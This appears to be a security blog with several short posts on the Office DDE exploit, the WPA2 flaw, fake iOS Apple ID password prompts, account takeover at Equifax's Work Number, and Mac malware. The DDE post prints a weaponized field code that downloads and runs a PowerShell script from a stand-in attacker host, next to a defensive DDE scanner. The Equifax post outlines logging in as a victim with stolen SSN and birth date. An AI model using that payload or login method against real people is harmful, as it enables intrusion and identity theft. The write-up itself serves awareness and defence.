Hackers Using Unpatched Microsoft Dynamic Data Exchange Exploit

Microsoft Office has a vulnerability in the way it handles its Dynamic Data Exchange (DDE) protocol. Exploiting it requires "no macros or memory corruption", it shows no security warnings if the field is crafted correctly, and at the time of the report it was not flagged by antivirus software. Thousands of applications speak DDE, including MS Word and Excel.

DDE lets two running applications share data, either once or whenever new data becomes available. For example, a DDE link can target a cell in an Excel workbook and receive updates whenever that cell is edited, so a cell in your own workbook stays in sync with the cell in the original document.

The SensePost blog post focused on using Word and DDE to get command execution without being detected. The attacker inserts a field into a Word document (which initially renders as an error message), then edits the field code behind that error so that it contains something like the following:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }

Or, you could do something worse than open the calculator, like this:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e "}

In other words, you tell Word to execute an automatically updating DDE field (DDEAUTO), and the "application" the field points at is the command prompt, which in turn launches your payload. In the proof-of-concept demonstration, the payload was a PowerShell one-liner that launched an Empire stager.

Whenever the document is opened, Word first asks whether to update the document with data from linked files. For anyone who works with DDE links, this prompt is nothing unusual. A second prompt, a security warning that the DDE field wants to start the command prompt, then appears; according to the blog, this second prompt can be hidden with "proper syntax modification". After that, all the attacker has to do is get the document onto the target system, get the target to open it, and have them click OK on the one remaining prompt that asks to allow the data to be shared. Boom, payload delivered.

Microsoft was sent this exploit, reproduced it, and decided that it was a feature, so it will not be patched anytime soon. Microsoft has since released Security Advisory 4053440 on securely opening Office documents that contain DDE fields; most of its mitigations involve the user disabling automatic link updates through the Windows Registry. That requires Registry Editor, and Microsoft's usual warning applies: an incorrect Registry edit can cause serious problems that may require reinstalling the operating system, so back up the affected keys before changing them.

This vulnerability is now being exploited by both cybercriminals and state-sponsored hackers. Notably, it has been used by the group "Fancy Bear" (APT28), which is believed to be affiliated with the Russian government, in a spear-phishing campaign in recent weeks that used the New York terror attack as bait to get users to open malicious documents that infected their systems with malware. It has also been used against several other organizations and companies in various forms.

Because DDE is a legitimate Office feature, nothing in Office itself stops the application a DDE field names from running once the user has accepted the prompts. One way to protect yourself is to disable DDE entirely on your machines. You can also apply Microsoft's recommended Registry settings to secure Office, or go into the options of the applications that use DDE and turn off automatic updating of links or receiving updates from other DDE applications. Protected View also helps: a document opened from e-mail or the internet does not update its fields until the user clicks Enable Editing. As always, don't click links or open attachments from e-mails unless you are certain the source is safe.
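A practical check for the technique described above, added here as an example (it is not code from the SensePost post or from Microsoft): a Python scanner that unzips a .docx and looks for DDE or DDEAUTO field codes. Word stores a field code either in a fldSimple attribute or spread over several instrText runs, and a crafted document can chop the keyword across those runs, so the scanner joins the runs of each field (nested fields included) before matching. The two sample documents are constructed inline for the demonstration and contain only the harmless calc.exe field shown above, not a real payload.

```python
"""Find DDE / DDEAUTO field codes inside .docx files (added example)."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
# Parts of a .docx that can carry fields: body, headers, footers, notes.
PART_RE = re.compile(r"^word/(document|header\d*|footer\d*|footnotes|endnotes)\.xml$")
# DDE and DDEAUTO are the field keywords that make Word start a DDE server.
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)


def _w(local):
    """Qualify a WordprocessingML tag or attribute name with its namespace."""
    return "{%s}%s" % (W, local)


def field_codes(xml_bytes):
    """Return every field code in one WordprocessingML part, whitespace-normalised.

    Simple fields keep the code in w:fldSimple/@w:instr. Complex fields spread
    it over w:instrText runs between fldChar begin and end; a crafted document
    can split the keyword across runs, so runs are joined before matching.
    """
    root = ET.fromstring(xml_bytes)
    codes = [fs.get(_w("instr"), "") for fs in root.iter(_w("fldSimple"))]
    depth, buf = 0, []
    for el in root.iter():          # pre-order walk == document order
        if el.tag == _w("fldChar"):
            kind = el.get(_w("fldCharType"))
            if kind == "begin":
                depth += 1
            elif kind == "end" and depth:
                depth -= 1
                if depth == 0:      # outermost field closed: emit joined code
                    codes.append("".join(buf))
                    buf = []
        elif el.tag == _w("instrText") and depth:
            buf.append(el.text or "")
    return [" ".join(c.split()) for c in codes]


def scan_docx(data):
    """Return [(part, field_code)] for every DDE/DDEAUTO field in a .docx blob."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if PART_RE.match(name):
                for code in field_codes(z.read(name)):
                    if DDE_RE.search(code):
                        hits.append((name, code))
    return hits


# --- constructed samples (not real malware; a minimal document.xml is enough
# for the scanner, a real .docx carries more parts) ---
def make_docx(body_xml):
    doc = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
           '<w:document xmlns:w="%s"><w:body>%s</w:body></w:document>') % (W, body_xml)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", doc)
    return buf.getvalue()


BENIGN = make_docx(
    '<w:p><w:fldSimple w:instr=" DATE \\@ &quot;d MMMM yyyy&quot; ">'
    '<w:r><w:t>1 January 2017</w:t></w:r></w:fldSimple></w:p>')

MALICIOUS = make_docx(
    # simple field, the same calc.exe field the page shows
    '<w:p><w:fldSimple w:instr=" DDEAUTO c:\\\\windows\\\\system32\\\\cmd.exe '
    '&quot;/k calc.exe&quot; "><w:r><w:t>x</w:t></w:r></w:fldSimple></w:p>'
    # complex field with the keyword chopped across two instrText runs ("DD"+"EAUTO"),
    # which a per-run regex would miss
    '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> DD</w:instrText></w:r>'
    '<w:r><w:instrText xml:space="preserve">EAUTO c:\\\\windows\\\\system32\\\\cmd.exe '
    '&quot;/k calc.exe&quot; </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
    '<w:r><w:t>Error! Unknown document property name.</w:t></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>')


if __name__ == "__main__":
    import sys
    targets = []
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            targets.append((path, f.read()))
    if not targets:
        targets = [("benign.docx", BENIGN), ("malicious.docx", MALICIOUS)]
    for label, blob in targets:
        found = scan_docx(blob)
        print("%s: %s" % (label, "DDE FIELD FOUND" if found else "clean"))
        for part, code in found:
            print("  %s: %s" % (part, code))
```

Run it with one or more .docx paths, or with no arguments to scan the two built-in samples. DDE fields are equally valid in headers, footers and footnotes, so the scanner walks those parts too; it does not inspect the older binary .doc format or .rtf, which encode fields differently.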

 

Daniel Szafran

 

Article Sources:

Macro-less Code Exec in MSWord (SensePost; contains demo and proof of concept for the exploit)

Russian ‘Fancy Bear’ Hackers Using (Unpatched) Microsoft Office DDE Exploit

Microsoft Security Advisory 4053440


Flaw in Wi-Fi encryption system used to exploit protected networks

Everyone knows they could be a potential target for cyber-crime; it is in the news almost every day. But just how vulnerable is an individual? CERT recently issued a notice explaining how your Wi-Fi network could be exploited if proper precautions are not taken.

On October 16th, 2017, the Computer Emergency Readiness Team made an announcement about protecting your sensitive information. In short, its advice is to update all your devices as soon as security fixes are available. The reason is that a flaw in WPA2, the widely used encryption protocol that protects wireless networks, can lead to the theft of your credit card information, e-mails, passwords, and so on.

Essentially, the flaw lets an attacker within Wi-Fi range read the traffic passing between a device and the access point. Once in, the attacker can also manipulate the data that is captured, and depending on the target's network configuration it is even possible to inject malware into that traffic. The unsettling part is that the flaw affects a very wide range of devices, including Android, Apple, Linux, and Windows.

Companies such as Intel, Microsoft, Google, and Apple have heeded this advice and released updates that protect people's devices from this issue.

– Jared Albert

 

Phishing for Apple ID passwords on iOS

It was recently shown that the legitimate dialog boxes that prompt an iOS user for the password to their Apple ID can be replicated with frightening fidelity. Felix Krause, an iOS developer and the author of fastlane, posted the proof of concept on his blog in an effort to get this "loophole which has been around for many years" closed. The fake boxes are nearly identical to the legitimate ones.

[Image: apple-id-phishing-attack]

In the side-by-side comparison the two are nearly indistinguishable. Unless you are looking for it, you would never tell them apart, and even if you suspected a phishing attack it would be nearly impossible to determine with certainty whether the prompt was legitimate. This particular box type shows the e-mail address associated with the Apple account, but there is also a version without the e-mail address.

[Image: apple-id-phishing-attacks]

Again, if you were not expecting a phishing attack, you would probably not think twice before entering your password.

The boxes are created, quite easily, with UIAlertController, a standard UIKit class. Krause did not disclose his exact code for security reasons, but a quick look at the UIAlertController page on Apple's developer site shows that building such a box is as easy as following a template: an alert with a title, a message, a text field and a button.

 

Thankfully, Krause also offered several tips to avoid being phished in this manner:

If you press the home button and both the app and the dialog box close, it was a phishing attack. If the dialog stays up while the app goes to the background, it is legitimate. This is because system dialogs are displayed by a separate system process rather than by the app, so they survive the app being sent to the background.

Don't even begin to enter your credentials into a popup. Even if you never tap the submit button, the app can read what you typed. Go into the Settings app and enter them there instead.

 

Users with two-factor authentication enabled are safer from phishing attacks of this nature, since the password alone is not enough. That said, if the app also asks for the two-factor authentication code and the user enters it, the whole protection is nullified.

As always, be careful when you’re putting in your credentials. You never know where phishing attacks will come from next.

 

– Daniel Szafran

 

Felix Krause blog: https://krausefx.com/blog/ios-privacy-stealpassword-easily-get-the-users-apple-id-password-just-by-asking

Source Article: https://thehackernews.com/2017/10/apple-id-password-hacking.html

Apple Developer UIAlertController:  https://developer.apple.com/documentation/uikit/uialertcontroller

Equifax: The Work Number

Everyone has heard about the Equifax security breach that compromised the personal data of about 145 million Americans, but not everyone has heard about another of Equifax's services: The Work Number.

[Screenshot: the employee login page at www.theworknumber.com/Employees]

The Work Number is a service that provides an individual’s detailed salary and employment history. It was designed to provide automated employment and income verification to employers. It can also provide proof of income should someone be applying for a loan.

With such a large database of private information, and the login page above being the first thing you see at www.theworknumber.com/Employees, you would expect a lot of security controls defending it. Initially, yes, but after the recent Equifax breach, maybe not so much.

To access the information one has to enter their employer's code, which would be easy to look up if the Equifax lookup system weren't down for maintenance. Then it asks for a "User ID", which in most cases is your SSN or a portion of it. Finally it asks for a "PIN", which defaults to some variation of your date of birth (mm/dd/yyyy or yyyy/mm/dd). After you log in it does require you to change the PIN and set up half a dozen security questions for verification. Then it lets you access any of your income or employer history in its database.

The troubling thing is that two of the major pieces of information stolen in the Equifax breach were DOB and SSN, so someone who also learns who your current employer is, in order to get the employer code, has everything needed to log in as you. Once in, an attacker can change your PIN and set up the security questions, locking you out of the whole system.

-Spencer Mycek

source: Krebsonsecurity

The Hard Apple: Why It’s Difficult to Acquire Malware on a Mac

It always seems like there is a new virus, new malware, or new adware popping up on a computer running Windows. But why do we not hear about this happening on a Mac? The answer lies under the operating system, tracing back to its Unix roots, along with the attackers' choice of target audience.

macOS is a Unix-based operating system, and Unix is normally a very secure operating system with its own built-in protections. On top of this, Apple has added its own security features. One of these is Gatekeeper, which by default blocks any application that is not from the App Store or digitally signed by a developer registered with Apple; the user can override it, but not silently. A second feature is App Sandboxing: a sandboxed application can only do what its declared entitlements allow, so it is isolated from system components and from parts of the computer that have nothing to do with the app's designed purpose. The third is FileVault 2, full-disk encryption that encrypts everything stored on the Mac so the data is unreadable without the user's password. These built-in protections help to create a more secure system for Apple's users.

Normally you might think Mac users would be an easy group to target, but the data suggests that most attackers consider the Mac user base too small to be worth the effort of building a virus or malware that can get past all of Apple's security obstacles. The reason there is so little Mac malware is that attackers have a larger and easier target audience in Windows users.

Despite the small amount of Mac malware, there have still been incidents. In 2017 alone there was reportedly a 230% increase in Mac malware. One example is OSX/Dok. Discovered in April 2017, it was a trojan that hijacked all of the Mac's incoming and outgoing web traffic by installing a malicious root certificate and routing the traffic through a proxy under the attackers' control. The trojan was signed with a valid Apple developer certificate, meaning the attackers had obtained a legitimate developer account, which is also why Gatekeeper let it run. Another attack, from February 2017, was called MacDownloader. This malware presented itself as a free update for Adobe Flash Player. When the installer ran, it told the user that adware had been found on the Mac and prompted for the system password, then began transmitting data (usernames, passwords, etc.) to a remote server. The final example of successful Mac malware is Safari-Get. Appearing in November 2016, this was a social-engineering attack that sent links out by e-mail; opening the link opened either an endless series of iTunes windows or an endless series of draft e-mails (depending on the macOS version), which would freeze the system or exhaust its memory and force a shutdown.

Regardless of the lack of effort attackers put toward Mac users, users should still take some care. This is easily done by keeping applications updated and being careful when clicking links or opening files.

-Ryan Keihm

Sources

Do Macs get viruses, and do Macs need antivirus software?

16 Apple Security Advances to Take Note of in 2016